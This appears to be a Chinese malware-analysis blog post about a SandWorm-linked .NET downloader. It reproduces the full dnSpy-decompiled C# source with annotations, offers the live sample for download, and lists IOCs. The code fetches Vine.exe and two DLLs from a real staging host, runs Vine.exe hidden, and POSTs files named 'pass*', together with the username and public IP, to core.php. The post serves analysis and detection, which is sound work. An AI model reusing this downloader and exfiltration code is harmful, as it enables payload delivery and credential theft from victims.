Virus_C#_SampleAnalysis


0x1 背景

这几天在做一些小结,除了二进制,也对其他的做点记录,本篇讲C#样本的简单分析.

前几天启明有篇文章讲到了 SandWorm 样本,漏洞部分文中没有分析,我就跟着文章的描述简单过了一遍,下载到了文章中提到的 Downloader 样本。用 PEiD 查壳,识别为 Microsoft Visual C# / Basic .NET(即 .NET 托管程序,可直接反编译),于是快速做了分析。

0x2 主角登场

本来该是样本的,但个人感觉dnSpy更牛逼闪闪,话不多说,上图:
dnSpy

注:在项目上右键:1 可以 Debug,2 可以保存为本地项目(见附件)。ILSpy 也可以完成同样的反编译工作,我个人更习惯用 dnSpy。

2.1 样本分析

从反编译结果看,该样本是一个下载并执行(Download & Execute)的 Downloader:`DownloadFiles` 通过明文 HTTP 从 hxxp://www.ictcoe.org.et/plugins/system/legacy/ 下载 Newtonsoft.Json.dll、System.Data.SQLite.DLL 和 Vine.exe 到 %APPDATA% 目录(已存在则跳过,且没有任何完整性校验);下载全部成功后 `Main` 以隐藏窗口方式启动 Vine.exe 并等待其退出;仅当 Vine.exe 返回 0 时,`UploadFiles` 遍历 %APPDATA% 下文件名以 "pass" 开头的文件,连同用户名、系统版本和通过 checkip.dyndns.org 获取的公网 IP 一起 POST 到同一域名下的 core.php,若服务端原样回显文件名则删除本地文件。代码中的 `num`/`goto IL_xxx` 是反编译 async 状态机的产物,不影响对逻辑的理解。

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net.Http;
using System.Threading.Tasks;

// Decompiled (dnSpy) listing of the downloader sample. It is reproduced for
// reading only: the `num`/`goto IL_xxx` constructs are decompiler artifacts of
// the async state machine (`num` is read before assignment), so this text is
// not expected to compile or be rebuilt as-is.
namespace DownloadAndExecute
{
    // Stager flow: DownloadFiles -> run Vine.exe hidden -> if it exits 0, UploadFiles.
    internal class Program
    {
        // One shared HttpClient for every request to the staging host and to checkip.dyndns.org.
        private static readonly HttpClient client = new HttpClient();
        // Set to true by DownloadFiles only after all three files are present.
        private static bool success = false;
        // Defaults to 1 so UploadFiles never runs unless Vine.exe actually exited with 0.
        private static int exitCode = 1;

        // Entry point. Blocks on the async helpers with .Wait() (console app, no sync context).
        private static void Main(string[] args)
        {
            Program.DownloadFiles().Wait();
            if (Program.success)
            {
                // Launch %APPDATA%\Vine.exe with no visible window and wait for it to finish.
                using (Process process = Process.Start(new ProcessStartInfo
                {
                    FileName = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe"),
                    WindowStyle = ProcessWindowStyle.Hidden,
                    WorkingDirectory = Path.GetDirectoryName(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe")),
                    CreateNoWindow = true
                }))
                {
                    process.WaitForExit();
                    Program.exitCode = process.ExitCode;
                }
            }
            // Exfiltration is gated on the second stage reporting success (exit code 0).
            if (Program.exitCode == 0)
            {
                Program.UploadFiles().Wait();
            }
        }

        // Exfiltrates every top-level file in %APPDATA% whose name starts with "pass".
        // For each match the file text, the current user name, the OS version string and
        // the public IP are form-POSTed to core.php on the staging host; if the server
        // replies with exactly the file name, the local file is deleted. All exceptions
        // (per file and overall) are swallowed, so failures are silent.
        // NOTE(review): the "pass*" files are presumably written by Vine.exe (it ships
        // with a SQLite dependency), but that is not visible here - confirm from Vine.exe.
        private static async Task UploadFiles()
        {
            try
            {
                int num;            // decompiler artifact: async state-machine state, unassigned here
                FileInfo[] array;
                int num2;           // index into `array`
                if (num > 2)
                {
                    // Non-recursive listing of %APPDATA% (GetFiles() without a pattern).
                    FileInfo[] files = new DirectoryInfo(Path.Combine(new string[]
                    {
                        Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)
                    })).GetFiles();
                    array = files;
                    num2 = 0;
                    goto IL_28A;
                }
                IL_70:  // loop body: upload one matching file
                FileInfo fileInfo;
                try
                {
                    string value = File.ReadAllText(fileInfo.FullName);
                    string value2 = await Program.GetExternalIPAddress();
                    // Form fields sent to the C2; "data"="data" looks like a fixed marker the
                    // server script keys on.
                    FormUrlEncodedContent content = new FormUrlEncodedContent(new Dictionary<string, string>
                    {
                        { "data", "data" },
                        { "username", Environment.UserName },
                        { "os_version", Environment.OSVersion.VersionString },
                        { "file_path", fileInfo.Name },
                        { "public_ip", value2 },
                        { "file_content", value }
                    });
                    // Server acknowledges receipt by echoing the file name; only then is the
                    // local copy removed.
                    if (await(await Program.client.PostAsync("http://www.ictcoe.org.et/plugins/system/legacy/core.php", content)).Content.ReadAsStringAsync() == fileInfo.Name)
                    {
                        fileInfo.Delete();
                    }
                    value = null;
                }
                catch (Exception)
                {
                    // Read/POST errors for this file are ignored; the loop continues.
                }
                IL_275:  // loop increment
                fileInfo = null;
                num2++;
                IL_28A:  // loop condition
                if (num2 >= array.Length)
                {
                    array = null;
                }
                else
                {
                    fileInfo = array[num2];
                    // Culture-sensitive StartsWith; only names beginning with "pass" are uploaded.
                    if (fileInfo.Name.StartsWith("pass"))
                    {
                        goto IL_70;
                    }
                    goto IL_275;
                }
            }
            catch (Exception)
            {
                // Directory enumeration errors are swallowed too.
            }
        }

        // Returns the host's public IP as reported by checkip.dyndns.org, or "" on any error.
        // The parsing takes the text after the first ':' (skipping one space) up to the
        // first '<' - this assumes a response body like "...Address: 1.2.3.4</body>";
        // the exact format is not shown here.
        private static async Task<string> GetExternalIPAddress()
        {
            string result;
            try
            {
                result = (await(await Program.client.GetAsync("http://checkip.dyndns.org")).Content.ReadAsStringAsync()).Split(new char[]
                {
                    ':'
                })[1].Substring(1).Split(new char[]
                {
                    '<'
                })[0];
            }
            catch (Exception)
            {
                result = "";
            }
            return result;
        }

        // Stages three files into %APPDATA% over plain HTTP: Newtonsoft.Json.dll,
        // System.Data.SQLite.DLL and Vine.exe. A file that already exists is not
        // re-downloaded, and there is no hash/signature check on what is written, so
        // anything on the path can substitute the payload. `success` is set only if all
        // three steps complete without throwing; any exception leaves it false and the
        // second stage is never launched.
        private static async Task DownloadFiles()
        {
            try
            {
                string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Newtonsoft.Json.dll");
                FileInfo fileInfo = new FileInfo(text);
                if (!fileInfo.Exists)
                {
                    byte[] buffer = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/Newtonsoft.Json.dll")).Content.ReadAsByteArrayAsync();
                    BinaryWriter expr_144 = new BinaryWriter(new FileStream(text, FileMode.Create));
                    expr_144.Write(buffer);
                    expr_144.Close();
                }
                fileInfo = new FileInfo(text);
                // Console output survives from development; useful as a sandbox indicator.
                Console.WriteLine("Newton soft json dll length is: " + fileInfo.Length);
                string text2 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "System.Data.SQLite.DLL");
                FileInfo fileInfo2 = new FileInfo(text2);
                if (!fileInfo2.Exists)
                {
                    byte[] var_7_27E = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/System.Data.SQLite.DLL")).Content.ReadAsByteArrayAsync();
                    BinaryWriter expr_291 = new BinaryWriter(new FileStream(text2, FileMode.Create));
                    expr_291.Write(var_7_27E);
                    expr_291.Close();
                }
                fileInfo2 = new FileInfo(text2);
                Console.WriteLine("Sqlite dll length is: " + fileInfo2.Length);
                string text3 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe");
                FileInfo fileInfo3 = new FileInfo(text3);
                if (!fileInfo3.Exists)
                {
                    byte[] var_8_3CB = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/Vine.exe")).Content.ReadAsByteArrayAsync();
                    BinaryWriter expr_3DE = new BinaryWriter(new FileStream(text3, FileMode.Create));
                    expr_3DE.Write(var_8_3CB);
                    expr_3DE.Close();
                }
                fileInfo3 = new FileInfo(text3);
                Console.WriteLine("Vine exe length is: " + fileInfo3.Length);
                // Only reached if every download/write above succeeded.
                Program.success = true;
                text = null;
                text2 = null;
                text3 = null;
            }
            catch (Exception)
            {
                // Any failure leaves `success` false; Main then skips execution and upload.
            }
        }
    }
}

0x3 Sample

Sample:请确认样本仅用于测试研究再下载,由此产生的其他后果本人概不负责。压缩包密码为国际惯例(infected)。注意:这是活体恶意样本,请只在隔离的虚拟机中运行;代码里的 ictcoe.org.et 和 checkip.dyndns.org 是样本会主动连接的地址,不要在生产网络中触发这些连接,同时可将上述域名、%APPDATA% 下的 Vine.exe 和以 "pass" 开头的文件作为 IOC 用于检测。

0x4 参考文章

“沙虫”二代来袭,office全线沦陷!
